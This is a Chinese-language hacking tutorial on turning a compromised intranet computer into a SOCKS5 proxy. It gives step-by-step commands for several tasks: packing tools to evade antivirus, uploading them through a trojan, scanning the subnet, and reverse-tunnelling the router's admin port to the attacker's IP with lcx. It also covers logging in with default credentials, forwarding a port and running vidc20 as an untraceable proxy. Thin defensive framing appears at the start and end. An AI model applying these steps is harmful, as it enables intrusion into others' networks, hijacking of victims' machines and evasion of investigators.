如何將內(nèi)網(wǎng)肉雞作成Socks5服務(wù)器
內(nèi)網(wǎng)中將肉雞制作成SOCKS5服務(wù)器有人說(shuō)并不可能,即便成功也無(wú)法利用。本篇文章就嘗試通過(guò)內(nèi)網(wǎng)制作Socks5服務(wù)器,黑客技術(shù)只是作為一種技術(shù)存在,希望廣大的安全管理員可以通過(guò)黑客技術(shù)來(lái)加強(qiáng)自己在企業(yè)防護(hù)中的安全防范技術(shù)。不要將黑客技術(shù)用于破壞的途徑上。
首先介紹一下使用的工具,lcx.exe 這是一個(gè)反向連接的內(nèi)網(wǎng)端口映射工具,VIDC20.exe也是一個(gè)端口映射工具,不過(guò)它也有代理服務(wù)器的功能,支持http/socks4/socks5代理,支持代理驗(yàn)證,支持udp代理,支持二級(jí)代理;還有S掃描器,這個(gè)只有一個(gè)可執(zhí)行文件,小巧方便,掃端口最合適了。這些工具在網(wǎng)上都有下載,在作代理服務(wù)之前,我們需要先作一下免殺,因?yàn)榇蟛糠謿⒍拒浖菤cx.exe和S掃描器的,如果不作免殺,那一上傳就可能被殺毒軟件給殺掉
像這種強(qiáng)悍的卡巴,在命令行下是沒(méi)有辦法中止的,所以只能作免殺了,其他的殺毒軟件在命令行下可以中止,不過(guò)需要一些技巧,因?yàn)樗鼈兌加芯€程保護(hù),用常規(guī)的方法是中止不了的。我曾經(jīng)在命令行下干掉過(guò)瑞星,只是方法比較繁瑣,所以就不在這里演示了。至于免殺方法嘛,只要簡(jiǎn)單的加下殼就可以過(guò)關(guān)了,據(jù)我實(shí)驗(yàn),先加個(gè)北斗3.5,再加aspack 2.12,之后再加北斗3.5,這樣處理后絕大部分殺軟件就不殺這兩個(gè)程序了,呵呵。簡(jiǎn)單吧,殺毒軟件也是會(huì)區(qū)別對(duì)待的,如果是一些流行木馬,加這三重殼是不能免殺的,對(duì)于一些不太重要的黑客工具,殺毒軟件就會(huì)顯得相對(duì)寬松的多了。我們就是鉆的殺毒軟件的這個(gè)空子,如果是加了三重殼也過(guò)不了殺毒軟件,那就不要怕麻煩將它們的特征碼給修改掉,就可以過(guò)殺毒軟件了,修改的方法網(wǎng)上有許多動(dòng)畫(huà),大家可以自己找找,我的PCSHARE馬就是這樣作的,過(guò)卡巴,瑞星、江民、瑞星、金山、諾頓、趨勢(shì)等殺毒軟件很輕松,也可以輕松過(guò)各種查馬工具,這就是我修改特征碼后加了三重殼作成的,一個(gè)超強(qiáng)的工具。呵呵。有些跑題了,言歸正傳。
工具準(zhǔn)備完備后,下面開(kāi)始作代理了。首先打開(kāi)你的木馬客戶端程序,將上面的這些工具上傳到內(nèi)網(wǎng)中的肉雞上,就放在WINDOWS目錄里吧,文件名嘛,最好改一下,免得引起對(duì)方注意。打開(kāi)對(duì)方的命令符,鍵入命令:ipconfig /all查看一下肉雞的IP地址,如:192.168.0.2,得到這個(gè)本機(jī)及網(wǎng)關(guān)的IP地址以后,我們就可以用S掃描器對(duì)同它同一網(wǎng)段的IP地址進(jìn)行掃描,看這臺(tái)肉雞的網(wǎng)關(guān)是什么類型的。S掃描器相信大家都會(huì)用了吧。
命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20
這個(gè)s-jk是我加三重殼免殺后的S掃描器,這條命令在整個(gè)網(wǎng)段中掃描開(kāi)放139 3389 1433 80 23端口的主機(jī),呵呵,這是為滲透內(nèi)部網(wǎng)絡(luò)作準(zhǔn)備,也許有很重要的信息出現(xiàn)呢。
經(jīng)過(guò)掃描發(fā)現(xiàn)這臺(tái)肉雞的網(wǎng)關(guān)開(kāi)放80號(hào)端口,這說(shuō)明這臺(tái)網(wǎng)關(guān)一定是臺(tái)路由器。那怎樣登錄進(jìn)它的路由器呢?大家都知道寬帶路由器在外網(wǎng)中是不能登錄的,只能由它的內(nèi)部網(wǎng)絡(luò)登錄,難道要進(jìn)肉雞的屏幕控制,用肉雞的IE登錄?非也,這樣很容易暴露,再說(shuō)肉雞上的管理員也許現(xiàn)在正在電腦前工作,你是根本沒(méi)有辦法進(jìn)行控制的,下面在自己的電腦上打開(kāi)命令提示符,命令:lcx -listen 21 8000 再回到肉雞的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解釋一下:218.57.179.152是我的外網(wǎng)IP,這樣就將肉雞的寬帶路由器的80端口映射到了我的電腦的21端上了,我連接本機(jī)的8000端口就可以了。
下一步就要打開(kāi)IE,地址欄中鍵入:http://127.0.0.1:8000回車后,盼望已久的并且很熟悉的登錄界面出現(xiàn)了。這正是寬帶路由器的登錄界面,只不過(guò)這不是我的寬帶路由器,而是另一個(gè)局域網(wǎng)的寬帶路由器,我熟練的鍵入的默認(rèn)用戶名及密碼,admin admin,確定后成功登錄了。
接下來(lái)的工作簡(jiǎn)直就是輕車熟路了,設(shè)置一個(gè)虛擬服務(wù)器指向這臺(tái)肉雞,端口設(shè)置成了個(gè)陌生的端口,不要設(shè)置成8080,因?yàn)閷拵酚善饕褂眠@個(gè)端口,它是不允許設(shè)置成這個(gè)端口的,我設(shè)置的是2233,保存后,我們?cè)倩氐饺怆u的命令行下,命令:vidc20 -d -p 2233 這個(gè)命令的意思就是以控制臺(tái)的方式啟動(dòng)vidc20.exe這個(gè)程序,開(kāi)2233服務(wù)端口提供代理服務(wù)。這臺(tái)肉雞已經(jīng)開(kāi)始提供SOCK5服務(wù)了,并且路由器上的映射也已經(jīng)正常工作,我們要作的就是打開(kāi)SOCK5客戶端程序,設(shè)置一下SOCKS5服務(wù)器的IP地址及端口,也就是這臺(tái)肉雞的外網(wǎng)IP。我們將IE的圖標(biāo)拖到SocksCap32的圖標(biāo)上創(chuàng)建了一個(gè)新快捷方式,這樣以后我們登錄到ASP馬時(shí)就可以雙擊SocksCap32中的IE進(jìn)行登錄了。如果你覺(jué)得不放心,可以登錄www.123cha.com,查看一下IP,IP地址顯示的是你的肉雞的IP,使用這種代理比使用匿名的HTTP代理還要安全的多,因?yàn)榻o你提供代理的是臺(tái)個(gè)人電腦,并且IP不固定,在一個(gè)局域網(wǎng)內(nèi)部,沒(méi)有一些監(jiān)控軟件記錄任何的連接,并且這臺(tái)個(gè)人電腦重啟后vidc20.exe并不在運(yùn)行,可以說(shuō)是毫無(wú)痕跡,這樣即使有人追查你的話,也只能查到你肉雞的IP為止,再想繼續(xù)追查就不太容易了。
有人說(shuō)如果管理員把寬帶路由器的密碼改掉了,那不是沒(méi)得玩了,我隨機(jī)挑選了五個(gè)局域網(wǎng)進(jìn)行測(cè)試,全部是默認(rèn)口令,看來(lái)設(shè)置默認(rèn)口令的概率還是滿高的。我分析了一下原因:一、可能是寬帶路由器只能由內(nèi)網(wǎng)連接,管理員對(duì)其安全性認(rèn)識(shí)不足。二、內(nèi)網(wǎng)中的電腦用戶都是菜鳥(niǎo),不需要作安全設(shè)置。三、管理員懈怠,沒(méi)把它當(dāng)回事。說(shuō)實(shí)話我的寬帶路由器也是設(shè)置的默認(rèn)口令,為什么沒(méi)有改掉呢?我覺(jué)得我應(yīng)該屬于第二種情況吧,內(nèi)網(wǎng)中全部是菜鳥(niǎo)用戶,所以根本必要修改掉,這樣就暴露了一個(gè)安全問(wèn)題,一旦內(nèi)網(wǎng)中的電腦中了木馬,入侵者就有可能獲得你的寬帶帳號(hào),用你的寬帶帳號(hào)刷Q幣、刷業(yè)務(wù);還可能登錄你的ISP將你的寬帶帳號(hào)給修改掉,讓你上不了網(wǎng)了。如果入侵者拿你作跳板,他作了壞事由你背黑鍋,那豈不是更加冤枉。所以,大家一定對(duì)內(nèi)網(wǎng)的安全問(wèn)題提高警惕。該打的補(bǔ)丁打上,該修改的默認(rèn)口令給修改掉,這樣就可以抵御大多數(shù)初級(jí)的入侵者的攻擊了。但要想絕對(duì)安全,那是不可能的,這個(gè)世界上沒(méi)有絕對(duì)的安全。
【編輯推薦】